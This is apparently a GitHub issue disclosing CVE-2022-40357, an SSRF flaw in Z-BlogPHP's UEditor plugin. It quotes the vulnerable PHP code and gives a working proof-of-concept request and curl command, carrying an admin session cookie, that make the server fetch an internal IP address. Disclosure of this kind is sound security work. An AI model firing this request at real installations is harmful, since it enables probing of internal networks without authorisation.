Headline
CVE-2022-40357: [Vuln] SSRF vulnerability in saveRemote Function · Issue #336 · zblogcn/zblogphp
A security issue was discovered in Z-BlogPHP <= 1.7.2. A Server-Side Request Forgery (SSRF) vulnerability in the zb_users/plugin/UEditor/php/action_crawler.php file allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the source parameter.
A Server-Side Request Forgery (SSRF) in action_crawler.php file of Z-BlogPHP allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the source parameter.
Test Environment: Ubuntu and PHP 7.2
Impact version: Z-BlogPHP <= 1.7.2
// zb_users/plugin/UEditor/php/controller.php $action = $_GET[‘action’];
switch ($action) { case 'config’: $result = json_encode($CONFIG); break;
/\* 上传图片 \*/
case 'uploadimage':
/\* 上传涂鸦 \*/
case 'uploadscrawl':
/\* 上传视频 \*/
case 'uploadvideo':
/\* 上传文件 \*/
case 'uploadfile':
$result = include "action\_upload.php";
break;
/\* 抓取远程文件 \*/
case 'catchimage':
$result = include "action\_crawler.php";
break;
default:
$result = json\_encode(array(
'state' => '请求地址出错',
));
break;
}
//zb_users/plugin/UEditor/php/action_crawler.php
foreach ($source as $imgUrl) { $item = new Uploader($imgUrl, $config, “remote”); $info = $item->getFileInfo(); array_push($list, array( “state” => $info[“state”], “url” => $info[“url”], “size” => $info[“size”], “title” => htmlspecialchars($info[“title”]), “original” => htmlspecialchars($info[“original”]), “source” => htmlspecialchars($imgUrl), )); }
// zb_users/plugin/UEditor/php/Uploader.class.php
public function __construct($fileField, $config, $type = “upload”) { global $zbp; $this->stateMap[‘ERROR_TYPE_NOT_ALLOWED’] = $zbp->lang[‘error’][‘26’]; $this->stateMap[‘ERROR_SIZE_EXCEED’] = $zbp->lang[‘error’][‘27’]; $this->stateMap[‘ERROR_UNKNOWN’] = $zbp->lang[‘error’][‘0’]; $this->fileField = $fileField; $this->config = $config; $this->type = $type; if ($type == “remote”) { $this->saveRemote(); } …
...
private function saveRemote() { global $zbp; $imgUrl = htmlspecialchars($this->fileField); $imgUrl = str_replace("&", "&", $imgUrl);
//http开头验证
if (strpos($imgUrl, "http") !== 0) {
$this\->stateInfo = $this\->getStateInfo("ERROR\_HTTP\_LINK");
return;
}
//获取请求头并检测死链
$heads = get\_headers($imgUrl, 1);
...
Because the source parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows
GET /zblog/zb_users/plugin/UEditor/php/controller.php?action=catchimage&source[1]=http://172.16.119.1/zfuzz HTTP/1.1
Host: 172.16.119.145
Cookie: timezone=8; username=admin; token=eec828fbf6857c2620e0bcd3d128a142e225dbaaac76572657c30d36b0df0a861665059400; addinfozblog=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D
Connection: close
You can also use the following curl command to verify the vulnerability
curl -i -s -k -X $'GET' \
-H $'Host: 172.16.119.145' -H $'Connection: close' \
-b $'timezone=8; username=admin; token=eec828fbf6857c2620e0bcd3d128a142e225dbaaac76572657c30d36b0df0a861665059400; addinfozblog=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D' \
$'http://172.16.119.145/zblog/zb_users/plugin/UEditor/php/controller.php?action=catchimage&source[1]=http://172.16.119.1/zfuzz'